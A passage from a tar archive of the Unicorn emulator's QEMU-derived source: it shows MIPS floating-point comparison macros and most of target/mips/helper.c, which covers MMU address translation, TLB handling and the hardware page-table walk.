&env->active_fpu.fp_status))) FOP_CONDN_S(sule, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(or, (float32_le_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(une, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(ne, (float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sor, (float32_le(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sune, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) FOP_CONDN_S(sne, (float32_lt(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/helper.c�������������������������������������������������������������0000664�0000000�0000000�00000137626�14675241067�0020053�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS emulation helpers for qemu. * * Copyright (c) 2004-2005 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "hw/mips/cpudevs.h" enum { TLBRET_XI = -6, TLBRET_RI = -5, TLBRET_DIRTY = -4, TLBRET_INVALID = -3, TLBRET_NOMATCH = -2, TLBRET_BADADDR = -1, TLBRET_MATCH = 0 }; /* no MMU emulation */ int no_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type) { *physical = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TLBRET_MATCH; } /* fixed mapping MMU emulation */ int fixed_mmu_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type) { if (address <= (int32_t)0x7FFFFFFFUL) { if (!(env->CP0_Status & (1 << CP0St_ERL))) { *physical = address + 0x40000000UL; } else { *physical = address; } } else if (address <= (int32_t)0xBFFFFFFFUL) { *physical = address & 0x1FFFFFFF; } else { *physical = address; } *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TLBRET_MATCH; } /* MIPS32/MIPS64 R4000-style MMU emulation */ int r4k_map_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong address, int rw, int access_type) { uint16_t ASID = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; uint32_t MMID = env->CP0_MemoryMapID; bool mi = !!((env->CP0_Config5 >> CP0C5_MI) & 1); uint32_t tlb_mmid; int i; MMID = mi ? MMID : (uint32_t) ASID; for (i = 0; i < env->tlb->tlb_in_use; i++) { r4k_tlb_t *tlb = &env->tlb->mmu.r4k.tlb[i]; /* 1k pages are not supported. */ target_ulong mask = tlb->PageMask | ~(TARGET_PAGE_MASK << 1); target_ulong tag = address & ~mask; target_ulong VPN = tlb->VPN & ~mask; #if defined(TARGET_MIPS64) tag &= env->SEGMask; #endif /* Check ASID/MMID, virtual page number & size */ tlb_mmid = mi ? tlb->MMID : (uint32_t) tlb->ASID; if ((tlb->G == 1 || tlb_mmid == MMID) && VPN == tag && !tlb->EHINV) { /* TLB match */ int n = !!(address & mask & ~(mask >> 1)); /* Check access rights */ if (!(n ? tlb->V1 : tlb->V0)) { return TLBRET_INVALID; } if (rw == MMU_INST_FETCH && (n ? tlb->XI1 : tlb->XI0)) { return TLBRET_XI; } if (rw == MMU_DATA_LOAD && (n ? tlb->RI1 : tlb->RI0)) { return TLBRET_RI; } if (rw != MMU_DATA_STORE || (n ? tlb->D1 : tlb->D0)) { *physical = tlb->PFN[n] | (address & (mask >> 1)); *prot = PAGE_READ; if (n ? tlb->D1 : tlb->D0) { *prot |= PAGE_WRITE; } if (!(n ? tlb->XI1 : tlb->XI0)) { *prot |= PAGE_EXEC; } return TLBRET_MATCH; } return TLBRET_DIRTY; } } return TLBRET_NOMATCH; } static int is_seg_am_mapped(unsigned int am, bool eu, int mmu_idx) { /* * Interpret access control mode and mmu_idx. * AdE? TLB? * AM K S U E K S U E * UK 0 0 1 1 0 0 - - 0 * MK 1 0 1 1 0 1 - - !eu * MSK 2 0 0 1 0 1 1 - !eu * MUSK 3 0 0 0 0 1 1 1 !eu * MUSUK 4 0 0 0 0 0 1 1 0 * USK 5 0 0 1 0 0 0 - 0 * - 6 - - - - - - - - * UUSK 7 0 0 0 0 0 0 0 0 */ int32_t adetlb_mask; switch (mmu_idx) { case 3: /* ERL */ /* If EU is set, always unmapped */ if (eu) { return 0; } /* fall through */ case MIPS_HFLAG_KM: /* Never AdE, TLB mapped if AM={1,2,3} */ adetlb_mask = 0x70000000; goto check_tlb; case MIPS_HFLAG_SM: /* AdE if AM={0,1}, TLB mapped if AM={2,3,4} */ adetlb_mask = 0xc0380000; goto check_ade; case MIPS_HFLAG_UM: /* AdE if AM={0,1,2,5}, TLB mapped if AM={3,4} */ adetlb_mask = 0xe4180000; /* fall through */ check_ade: /* does this AM cause AdE in current execution mode */ if ((adetlb_mask << am) < 0) { return TLBRET_BADADDR; } adetlb_mask <<= 8; /* fall through */ check_tlb: /* is this AM mapped in current execution mode */ return ((adetlb_mask << am) < 0); default: assert(0); return TLBRET_BADADDR; }; } static int get_seg_physical_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong real_address, int rw, int access_type, int mmu_idx, unsigned int am, bool eu, target_ulong segmask, hwaddr physical_base) { int mapped = is_seg_am_mapped(am, eu, mmu_idx); if (mapped < 0) { /* is_seg_am_mapped can report TLBRET_BADADDR */ return mapped; } else if (mapped) { /* The segment is TLB mapped */ return env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { /* The segment is unmapped */ *physical = physical_base | (real_address & segmask); *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return TLBRET_MATCH; } } static int get_segctl_physical_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong real_address, int rw, int access_type, int mmu_idx, uint16_t segctl, target_ulong segmask) { unsigned int am = (segctl & CP0SC_AM_MASK) >> CP0SC_AM; bool eu = (segctl >> CP0SC_EU) & 1; hwaddr pa = ((hwaddr)segctl & CP0SC_PA_MASK) << 20; return get_seg_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, am, eu, segmask, pa & ~(hwaddr)segmask); } static int get_physical_address(CPUMIPSState *env, hwaddr *physical, int *prot, target_ulong real_address, int rw, int access_type, int mmu_idx) { /* User mode can only access useg/xuseg */ #if defined(TARGET_MIPS64) int user_mode = mmu_idx == MIPS_HFLAG_UM; int supervisor_mode = mmu_idx == MIPS_HFLAG_SM; int kernel_mode = !user_mode && !supervisor_mode; int UX = (env->CP0_Status & (1 << CP0St_UX)) != 0; int SX = (env->CP0_Status & (1 << CP0St_SX)) != 0; int KX = (env->CP0_Status & (1 << CP0St_KX)) != 0; #endif int ret = TLBRET_MATCH; /* effective address (modified for KVM T&E kernel segments) */ target_ulong address = real_address; #define USEG_LIMIT ((target_ulong)(int32_t)0x7FFFFFFFUL) #define KSEG0_BASE ((target_ulong)(int32_t)0x80000000UL) #define KSEG1_BASE ((target_ulong)(int32_t)0xA0000000UL) #define KSEG2_BASE ((target_ulong)(int32_t)0xC0000000UL) #define KSEG3_BASE ((target_ulong)(int32_t)0xE0000000UL) #define KVM_KSEG0_BASE ((target_ulong)(int32_t)0x40000000UL) #define KVM_KSEG2_BASE ((target_ulong)(int32_t)0x60000000UL) #if 0 if (mips_um_ksegs_enabled()) { /* KVM T&E adds guest kernel segments in useg */ if (real_address >= KVM_KSEG0_BASE) { if (real_address < KVM_KSEG2_BASE) { /* kseg0 */ address += KSEG0_BASE - KVM_KSEG0_BASE; } else if (real_address <= USEG_LIMIT) { /* kseg2/3 */ address += KSEG2_BASE - KVM_KSEG2_BASE; } } } #endif if (address <= USEG_LIMIT) { /* useg */ uint16_t segctl; if (address >= 0x40000000UL) { segctl = env->CP0_SegCtl2; } else { segctl = env->CP0_SegCtl2 >> 16; } ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, segctl, 0x3FFFFFFF); #if defined(TARGET_MIPS64) } else if (address < 0x4000000000000000ULL) { /* xuseg */ if (UX && address <= (0x3FFFFFFFFFFFFFFFULL & env->SEGMask)) { ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { ret = TLBRET_BADADDR; } } else if (address < 0x8000000000000000ULL) { /* xsseg */ if ((supervisor_mode || kernel_mode) && SX && address <= (0x7FFFFFFFFFFFFFFFULL & env->SEGMask)) { ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { ret = TLBRET_BADADDR; } } else if (address < 0xC000000000000000ULL) { /* xkphys */ if ((address & 0x07FFFFFFFFFFFFFFULL) <= env->PAMask) { /* KX/SX/UX bit to check for each xkphys EVA access mode */ static const uint8_t am_ksux[8] = { [CP0SC_AM_UK] = (1u << CP0St_KX), [CP0SC_AM_MK] = (1u << CP0St_KX), [CP0SC_AM_MSK] = (1u << CP0St_SX), [CP0SC_AM_MUSK] = (1u << CP0St_UX), [CP0SC_AM_MUSUK] = (1u << CP0St_UX), [CP0SC_AM_USK] = (1u << CP0St_SX), [6] = (1u << CP0St_KX), [CP0SC_AM_UUSK] = (1u << CP0St_UX), }; unsigned int am = CP0SC_AM_UK; unsigned int xr = (env->CP0_SegCtl2 & CP0SC2_XR_MASK) >> CP0SC2_XR; if (xr & (1 << ((address >> 59) & 0x7))) { am = (env->CP0_SegCtl1 & CP0SC1_XAM_MASK) >> CP0SC1_XAM; } /* Does CP0_Status.KX/SX/UX permit the access mode (am) */ if (env->CP0_Status & am_ksux[am]) { ret = get_seg_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, am, false, env->PAMask, 0); } else { ret = TLBRET_BADADDR; } } else { ret = TLBRET_BADADDR; } } else if (address < 0xFFFFFFFF80000000ULL) { /* xkseg */ if (kernel_mode && KX && address <= (0xFFFFFFFF7FFFFFFFULL & env->SEGMask)) { ret = env->tlb->map_address(env, physical, prot, real_address, rw, access_type); } else { ret = TLBRET_BADADDR; } #endif } else if (address < KSEG1_BASE) { /* kseg0 */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl1 >> 16, 0x1FFFFFFF); } else if (address < KSEG2_BASE) { /* kseg1 */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl1, 0x1FFFFFFF); } else if (address < KSEG3_BASE) { /* sseg (kseg2) */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl0 >> 16, 0x1FFFFFFF); } else { /* * kseg3 * XXX: debug segment is not emulated */ ret = get_segctl_physical_address(env, physical, prot, real_address, rw, access_type, mmu_idx, env->CP0_SegCtl0, 0x1FFFFFFF); } return ret; } void cpu_mips_tlb_flush(CPUMIPSState *env) { /* Flush qemu's TLB and discard all shadowed entries. */ tlb_flush(env_cpu(env)); env->tlb->tlb_in_use = env->tlb->nb_tlb; } /* Called for updates to CP0_Status. */ void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, int tc) { int32_t tcstatus, *tcst; uint32_t v = cpu->CP0_Status; uint32_t cu, mx, asid, ksu; uint32_t mask = ((1 << CP0TCSt_TCU3) | (1 << CP0TCSt_TCU2) | (1 << CP0TCSt_TCU1) | (1 << CP0TCSt_TCU0) | (1 << CP0TCSt_TMX) | (3 << CP0TCSt_TKSU) | (0xff << CP0TCSt_TASID)); cu = (v >> CP0St_CU0) & 0xf; mx = (v >> CP0St_MX) & 0x1; ksu = (v >> CP0St_KSU) & 0x3; asid = env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask; tcstatus = cu << CP0TCSt_TCU0; tcstatus |= mx << CP0TCSt_TMX; tcstatus |= ksu << CP0TCSt_TKSU; tcstatus |= asid; if (tc == cpu->current_tc) { tcst = &cpu->active_tc.CP0_TCStatus; } else { tcst = &cpu->tcs[tc].CP0_TCStatus; } *tcst &= ~mask; *tcst |= tcstatus; compute_hflags(cpu); } void cpu_mips_store_status(CPUMIPSState *env, target_ulong val) { uint32_t mask = env->CP0_Status_rw_bitmask; target_ulong old = env->CP0_Status; if (env->insn_flags & ISA_MIPS32R6) { bool has_supervisor = extract32(mask, CP0St_KSU, 2) == 0x3; #if defined(TARGET_MIPS64) uint32_t ksux = (1 << CP0St_KX) & val; ksux |= (ksux >> 1) & val; /* KX = 0 forces SX to be 0 */ ksux |= (ksux >> 1) & val; /* SX = 0 forces UX to be 0 */ val = (val & ~(7 << CP0St_UX)) | ksux; #endif if (has_supervisor && extract32(val, CP0St_KSU, 2) == 0x3) { mask &= ~(3 << CP0St_KSU); } mask &= ~(((1 << CP0St_SR) | (1 << CP0St_NMI)) & val); } env->CP0_Status = (old & ~mask) | (val & mask); #if defined(TARGET_MIPS64) if ((env->CP0_Status ^ old) & (old & (7 << CP0St_UX))) { /* Access to at least one of the 64-bit segments has been disabled */ tlb_flush(env_cpu(env)); } #endif if (env->CP0_Config3 & (1 << CP0C3_MT)) { sync_c0_status(env, env, env->current_tc); } else { compute_hflags(env); } } void cpu_mips_store_cause(CPUMIPSState *env, target_ulong val) { uint32_t mask = 0x00C00300; if (env->insn_flags & ISA_MIPS32R2) { mask |= 1 << CP0Ca_DC; } if (env->insn_flags & ISA_MIPS32R6) { mask &= ~((1 << CP0Ca_WP) & val); } env->CP0_Cause = (env->CP0_Cause & ~mask) | (val & mask); #if 0 uint32_t old = env->CP0_Cause; if ((old ^ env->CP0_Cause) & (1 << CP0Ca_DC)) { if (env->CP0_Cause & (1 << CP0Ca_DC)) { cpu_mips_stop_count(env); } else { cpu_mips_start_count(env); } } int i; /* Set/reset software interrupts */ for (i = 0 ; i < 2 ; i++) { if ((old ^ env->CP0_Cause) & (1 << (CP0Ca_IP + i))) { cpu_mips_soft_irq(env, i, env->CP0_Cause & (1 << (CP0Ca_IP + i))); } } #endif } static void raise_mmu_exception(CPUMIPSState *env, target_ulong address, int rw, int tlb_error) { CPUState *cs = env_cpu(env); int exception = 0, error_code = 0; if (rw == MMU_INST_FETCH) { error_code |= EXCP_INST_NOTAVAIL; } switch (tlb_error) { default: case TLBRET_BADADDR: /* Reference to kernel address from user mode or supervisor mode */ /* Reference to supervisor address from user mode */ if (rw == MMU_DATA_STORE) { exception = EXCP_AdES; } else { exception = EXCP_AdEL; } break; case TLBRET_NOMATCH: /* No TLB match for a mapped address */ if (rw == MMU_DATA_STORE) { exception = EXCP_TLBS; } else { exception = EXCP_TLBL; } error_code |= EXCP_TLB_NOMATCH; break; case TLBRET_INVALID: /* TLB match with no valid bit */ if (rw == MMU_DATA_STORE) { exception = EXCP_TLBS; } else { exception = EXCP_TLBL; } break; case TLBRET_DIRTY: /* TLB match but 'D' bit is cleared */ exception = EXCP_LTLBL; break; case TLBRET_XI: /* Execute-Inhibit Exception */ if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { exception = EXCP_TLBXI; } else { exception = EXCP_TLBL; } break; case TLBRET_RI: /* Read-Inhibit Exception */ if (env->CP0_PageGrain & (1 << CP0PG_IEC)) { exception = EXCP_TLBRI; } else { exception = EXCP_TLBL; } break; } /* Raise exception */ if (!(env->hflags & MIPS_HFLAG_DM)) { env->CP0_BadVAddr = address; } env->CP0_Context = (env->CP0_Context & ~0x007fffff) | ((address >> 9) & 0x007ffff0); env->CP0_EntryHi = (env->CP0_EntryHi & env->CP0_EntryHi_ASID_mask) | (env->CP0_EntryHi & (1 << CP0EnHi_EHINV)) | (address & (TARGET_PAGE_MASK << 1)); #if defined(TARGET_MIPS64) env->CP0_EntryHi &= env->SEGMask; env->CP0_XContext = (env->CP0_XContext & ((~0ULL) << (env->SEGBITS - 7))) | /* PTEBase */ (extract64(address, 62, 2) << (env->SEGBITS - 9)) | /* R */ (extract64(address, 13, env->SEGBITS - 13) << 4); /* BadVPN2 */ #endif cs->exception_index = exception; env->error_code = error_code; } hwaddr mips_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; hwaddr phys_addr; int prot; if (get_physical_address(env, &phys_addr, &prot, addr, 0, ACCESS_INT, cpu_mmu_index(env, false)) != 0) { return -1; } return phys_addr; } #if !defined(TARGET_MIPS64) /* * Perform hardware page table walk * * Memory accesses are performed using the KERNEL privilege level. * Synchronous exceptions detected on memory accesses cause a silent exit * from page table walking, resulting in a TLB or XTLB Refill exception. * * Implementations are not required to support page table walk memory * accesses from mapped memory regions. When an unsupported access is * attempted, a silent exit is taken, resulting in a TLB or XTLB Refill * exception. * * Note that if an exception is caused by AddressTranslation or LoadMemory * functions, the exception is not taken, a silent exit is taken, * resulting in a TLB or XTLB Refill exception. */ static bool get_pte(CPUMIPSState *env, uint64_t vaddr, int entry_size, uint64_t *pte) { if ((vaddr & ((entry_size >> 3) - 1)) != 0) { return false; } if (entry_size == 64) { *pte = cpu_ldq_code(env, vaddr); } else { *pte = cpu_ldl_code(env, vaddr); } return true; } static uint64_t get_tlb_entry_layout(CPUMIPSState *env, uint64_t entry, int entry_size, int ptei) { uint64_t result = entry; uint64_t rixi; if (ptei > entry_size) { ptei -= 32; } result >>= (ptei - 2); rixi = result & 3; result >>= 2; result |= rixi << CP0EnLo_XI; return result; } static int walk_directory(CPUMIPSState *env, uint64_t *vaddr, int directory_index, bool *huge_page, bool *hgpg_directory_hit, uint64_t *pw_entrylo0, uint64_t *pw_entrylo1) { int dph = (env->CP0_PWCtl >> CP0PC_DPH) & 0x1; int psn = (env->CP0_PWCtl >> CP0PC_PSN) & 0x3F; int hugepg = (env->CP0_PWCtl >> CP0PC_HUGEPG) & 0x1; int pf_ptew = (env->CP0_PWField >> CP0PF_PTEW) & 0x3F; int ptew = (env->CP0_PWSize >> CP0PS_PTEW) & 0x3F; int native_shift = (((env->CP0_PWSize >> CP0PS_PS) & 1) == 0) ? 2 : 3; int directory_shift = (ptew > 1) ? -1 : (hugepg && (ptew == 1)) ? native_shift + 1 : native_shift; int leaf_shift = (ptew > 1) ? -1 : (ptew == 1) ? native_shift + 1 : native_shift; uint32_t direntry_size = 1 << (directory_shift + 3); uint32_t leafentry_size = 1 << (leaf_shift + 3); uint64_t entry; uint64_t paddr; int prot; uint64_t lsb = 0; uint64_t w = 0; if (get_physical_address(env, &paddr, &prot, *vaddr, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { /* wrong base address */ return 0; } if (!get_pte(env, *vaddr, direntry_size, &entry)) { return 0; } if ((entry & (1ULL << psn)) && hugepg) { *huge_page = true; *hgpg_directory_hit = true; entry = get_tlb_entry_layout(env, entry, leafentry_size, pf_ptew); w = directory_index - 1; if (directory_index & 0x1) { /* Generate adjacent page from same PTE for odd TLB page */ lsb = (1 << w) >> 6; *pw_entrylo0 = entry & ~lsb; /* even page */ *pw_entrylo1 = entry | lsb; /* odd page */ } else if (dph) { int oddpagebit = 1 << leaf_shift; uint64_t vaddr2 = *vaddr ^ oddpagebit; if (*vaddr & oddpagebit) { *pw_entrylo1 = entry; } else { *pw_entrylo0 = entry; } if (get_physical_address(env, &paddr, &prot, vaddr2, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { return 0; } if (!get_pte(env, vaddr2, leafentry_size, &entry)) { return 0; } entry = get_tlb_entry_layout(env, entry, leafentry_size, pf_ptew); if (*vaddr & oddpagebit) { *pw_entrylo0 = entry; } else { *pw_entrylo1 = entry; } } else { return 0; } return 1; } else { *vaddr = entry; return 2; } } static bool page_table_walk_refill(CPUMIPSState *env, vaddr address, int rw, int mmu_idx) { int gdw = (env->CP0_PWSize >> CP0PS_GDW) & 0x3F; int udw = (env->CP0_PWSize >> CP0PS_UDW) & 0x3F; int mdw = (env->CP0_PWSize >> CP0PS_MDW) & 0x3F; int ptw = (env->CP0_PWSize >> CP0PS_PTW) & 0x3F; int ptew = (env->CP0_PWSize >> CP0PS_PTEW) & 0x3F; /* Initial values */ bool huge_page = false; bool hgpg_bdhit = false; bool hgpg_gdhit = false; bool hgpg_udhit = false; bool hgpg_mdhit = false; int32_t pw_pagemask = 0; target_ulong pw_entryhi = 0; uint64_t pw_entrylo0 = 0; uint64_t pw_entrylo1 = 0; /* Native pointer size */ /*For the 32-bit architectures, this bit is fixed to 0.*/ int native_shift = (((env->CP0_PWSize >> CP0PS_PS) & 1) == 0) ? 2 : 3; /* Indices from PWField */ int pf_gdw = (env->CP0_PWField >> CP0PF_GDW) & 0x3F; int pf_udw = (env->CP0_PWField >> CP0PF_UDW) & 0x3F; int pf_mdw = (env->CP0_PWField >> CP0PF_MDW) & 0x3F; int pf_ptw = (env->CP0_PWField >> CP0PF_PTW) & 0x3F; int pf_ptew = (env->CP0_PWField >> CP0PF_PTEW) & 0x3F; /* Indices computed from faulting address */ int gindex = (address >> pf_gdw) & ((1 << gdw) - 1); int uindex = (address >> pf_udw) & ((1 << udw) - 1); int mindex = (address >> pf_mdw) & ((1 << mdw) - 1); int ptindex = (address >> pf_ptw) & ((1 << ptw) - 1); /* Other HTW configs */ int hugepg = (env->CP0_PWCtl >> CP0PC_HUGEPG) & 0x1; /* HTW Shift values (depend on entry size) */ int directory_shift = (ptew > 1) ? -1 : (hugepg && (ptew == 1)) ? native_shift + 1 : native_shift; int leaf_shift = (ptew > 1) ? -1 : (ptew == 1) ? native_shift + 1 : native_shift; /* Offsets into tables */ int goffset = gindex << directory_shift; int uoffset = uindex << directory_shift; int moffset = mindex << directory_shift; int ptoffset0 = (ptindex >> 1) << (leaf_shift + 1); int ptoffset1 = ptoffset0 | (1 << (leaf_shift)); uint32_t leafentry_size = 1 << (leaf_shift + 3); /* Starting address - Page Table Base */ uint64_t vaddr = env->CP0_PWBase; uint64_t dir_entry; uint64_t paddr; int prot; int m; if (!(env->CP0_Config3 & (1 << CP0C3_PW))) { /* walker is unimplemented */ return false; } if (!(env->CP0_PWCtl & (1 << CP0PC_PWEN))) { /* walker is disabled */ return false; } if (!(gdw > 0 || udw > 0 || mdw > 0)) { /* no structure to walk */ return false; } if ((directory_shift == -1) || (leaf_shift == -1)) { return false; } /* Global Directory */ if (gdw > 0) { vaddr |= goffset; switch (walk_directory(env, &vaddr, pf_gdw, &huge_page, &hgpg_gdhit, &pw_entrylo0, &pw_entrylo1)) { case 0: return false; case 1: goto refill; case 2: default: break; } } /* Upper directory */ if (udw > 0) { vaddr |= uoffset; switch (walk_directory(env, &vaddr, pf_udw, &huge_page, &hgpg_udhit, &pw_entrylo0, &pw_entrylo1)) { case 0: return false; case 1: goto refill; case 2: default: break; } } /* Middle directory */ if (mdw > 0) { vaddr |= moffset; switch (walk_directory(env, &vaddr, pf_mdw, &huge_page, &hgpg_mdhit, &pw_entrylo0, &pw_entrylo1)) { case 0: return false; case 1: goto refill; case 2: default: break; } } /* Leaf Level Page Table - First half of PTE pair */ vaddr |= ptoffset0; if (get_physical_address(env, &paddr, &prot, vaddr, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { return false; } if (!get_pte(env, vaddr, leafentry_size, &dir_entry)) { return false; } dir_entry = get_tlb_entry_layout(env, dir_entry, leafentry_size, pf_ptew); pw_entrylo0 = dir_entry; /* Leaf Level Page Table - Second half of PTE pair */ vaddr |= ptoffset1; if (get_physical_address(env, &paddr, &prot, vaddr, MMU_DATA_LOAD, ACCESS_INT, cpu_mmu_index(env, false)) != TLBRET_MATCH) { return false; } if (!get_pte(env, vaddr, leafentry_size, &dir_entry)) { return false; } dir_entry = get_tlb_entry_layout(env, dir_entry, leafentry_size, pf_ptew); pw_entrylo1 = dir_entry; refill: m = (1 << pf_ptw) - 1; if (huge_page) { switch (hgpg_bdhit << 3 | hgpg_gdhit << 2 | hgpg_udhit << 1 | hgpg_mdhit) { case 4: m = (1 << pf_gdw) - 1; if (pf_gdw & 1) { m >>= 1; } break; case 2: m = (1 << pf_udw) - 1; if (pf_udw & 1) { m >>= 1; } break; case 1: m = (1 << pf_mdw) - 1; if (pf_mdw & 1) { m >>= 1; } break; } } pw_pagemask = m >> 12; update_pagemask(env, pw_pagemask << 13, &pw_pagemask); pw_entryhi = (address & ~0x1fff) | (env->CP0_EntryHi & 0xFF); { target_ulong tmp_entryhi = env->CP0_EntryHi; int32_t tmp_pagemask = env->CP0_PageMask; uint64_t tmp_entrylo0 = env->CP0_EntryLo0; uint64_t tmp_entrylo1 = env->CP0_EntryLo1; env->CP0_EntryHi = pw_entryhi; env->CP0_PageMask = pw_pagemask; env->CP0_EntryLo0 = pw_entrylo0; env->CP0_EntryLo1 = pw_entrylo1; /* * The hardware page walker inserts a page into the TLB in a manner * identical to a TLBWR instruction as executed by the software refill * handler. */ r4k_helper_tlbwr(env); env->CP0_EntryHi = tmp_entryhi; env->CP0_PageMask = tmp_pagemask; env->CP0_EntryLo0 = tmp_entrylo0; env->CP0_EntryLo1 = tmp_entrylo1; } return true; } #endif bool mips_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; hwaddr physical; int prot; int mips_access_type; int ret = TLBRET_BADADDR; /* data access */ /* XXX: put correct access by using cpu_restore_state() correctly */ mips_access_type = ACCESS_INT; ret = get_physical_address(env, &physical, &prot, address, access_type, mips_access_type, mmu_idx); switch (ret) { case TLBRET_MATCH: qemu_log_mask(CPU_LOG_MMU, "%s address=%" VADDR_PRIx " physical " TARGET_FMT_plx " prot %d\n", __func__, address, physical, prot); break; default: qemu_log_mask(CPU_LOG_MMU, "%s address=%" VADDR_PRIx " ret %d\n", __func__, address, ret); break; } if (ret == TLBRET_MATCH) { tlb_set_page(cs, address & TARGET_PAGE_MASK, physical & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } #if !defined(TARGET_MIPS64) if ((ret == TLBRET_NOMATCH) && (env->tlb->nb_tlb > 1)) { /* * Memory reads during hardware page table walking are performed * as if they were kernel-mode load instructions. */ int mode = (env->hflags & MIPS_HFLAG_KSU); bool ret_walker; env->hflags &= ~MIPS_HFLAG_KSU; ret_walker = page_table_walk_refill(env, address, access_type, mmu_idx); env->hflags |= mode; if (ret_walker) { ret = get_physical_address(env, &physical, &prot, address, access_type, mips_access_type, mmu_idx); if (ret == TLBRET_MATCH) { tlb_set_page(cs, address & TARGET_PAGE_MASK, physical & TARGET_PAGE_MASK, prot, mmu_idx, TARGET_PAGE_SIZE); return true; } } } #endif if (probe) { return false; } raise_mmu_exception(env, address, access_type, ret); do_raise_exception_err(env, cs->exception_index, env->error_code, retaddr); } hwaddr cpu_mips_translate_address(CPUMIPSState *env, target_ulong address, int rw) { hwaddr physical; int prot; int access_type; int ret = 0; /* data access */ access_type = ACCESS_INT; ret = get_physical_address(env, &physical, &prot, address, rw, access_type, cpu_mmu_index(env, false)); if (ret != TLBRET_MATCH) { raise_mmu_exception(env, address, rw, ret); return -1LL; } else { return physical; } } #if 0 static const char * const excp_names[EXCP_LAST + 1] = { [EXCP_RESET] = "reset", [EXCP_SRESET] = "soft reset", [EXCP_DSS] = "debug single step", [EXCP_DINT] = "debug interrupt", [EXCP_NMI] = "non-maskable interrupt", [EXCP_MCHECK] = "machine check", [EXCP_EXT_INTERRUPT] = "interrupt", [EXCP_DFWATCH] = "deferred watchpoint", [EXCP_DIB] = "debug instruction breakpoint", [EXCP_IWATCH] = "instruction fetch watchpoint", [EXCP_AdEL] = "address error load", [EXCP_AdES] = "address error store", [EXCP_TLBF] = "TLB refill", [EXCP_IBE] = "instruction bus error", [EXCP_DBp] = "debug breakpoint", [EXCP_SYSCALL] = "syscall", [EXCP_BREAK] = "break", [EXCP_CpU] = "coprocessor unusable", [EXCP_RI] = "reserved instruction", [EXCP_OVERFLOW] = "arithmetic overflow", [EXCP_TRAP] = "trap", [EXCP_FPE] = "floating point", [EXCP_DDBS] = "debug data break store", [EXCP_DWATCH] = "data watchpoint", [EXCP_LTLBL] = "TLB modify", [EXCP_TLBL] = "TLB load", [EXCP_TLBS] = "TLB store", [EXCP_DBE] = "data bus error", [EXCP_DDBL] = "debug data break load", [EXCP_THREAD] = "thread", [EXCP_MDMX] = "MDMX", [EXCP_C2E] = "precise coprocessor 2", [EXCP_CACHE] = "cache error", [EXCP_TLBXI] = "TLB execute-inhibit", [EXCP_TLBRI] = "TLB read-inhibit", [EXCP_MSADIS] = "MSA disabled", [EXCP_MSAFPE] = "MSA floating point", }; #endif target_ulong exception_resume_pc(CPUMIPSState *env) { target_ulong bad_pc; target_ulong isa_mode; isa_mode = 